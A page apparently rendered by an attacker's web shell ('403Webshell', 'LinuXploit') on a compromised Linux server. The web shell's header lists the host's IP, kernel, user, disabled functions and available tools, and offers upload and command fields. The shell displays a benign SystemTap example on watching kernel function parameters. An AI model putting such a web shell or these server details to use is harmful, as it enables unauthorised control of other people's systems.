403Webshell
Server IP : 103.4.122.14  /  Your IP : 216.73.216.103
Web Server : Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
System : Linux cwp2.slnet.com.au 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : statewid ( 1251)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/systemtap/examples/general/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /usr/share/systemtap/examples/general/varwatch.txt
varwatch.stp - Watch a Variable Changing Value in a Thread

  This script places a set of probes (specified by $1), each of which monitors
  the state of some context $variable expression (specified by $2).  Whenever
  the value changes, with respect to the active thread, the event is traced.

$ stap -w varwatch.stp 'kernel.function("sys_*@fs/open.c:*")' \
'$$parms' -c "ls > /dev/null"

sh[32715] kernel.function("SyS_access@fs/open.c:395") $$parms:
filename=0x7f340e5cb750 mode=0x4
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340e5ca048 flags=0x80000 mode=0x1
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340e7c22cb flags=0x80000 mode=0x7f340e7d0168
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340e7c9e89 flags=0x80000 mode=0x7f340e7d0168
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340e7caf39 flags=0x80000 mode=0x7f340e7d0168
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x4a8ddf flags=0x802 mode=0x6eb0c8
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340df403d0 flags=0x80000 mode=0x7f340e17a768
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340df3d2ea flags=0x80000 mode=0x1b6
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340df3ea80 flags=0x0 mode=0x0
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
[...]

The output monitors the parameters to functions sys_*. This can
be narrowed down to follow a certain function, in this example
maybe sys_close, throughout a process's lifetime.

Youez - 2016 - github.com/yon3zu
LinuXploit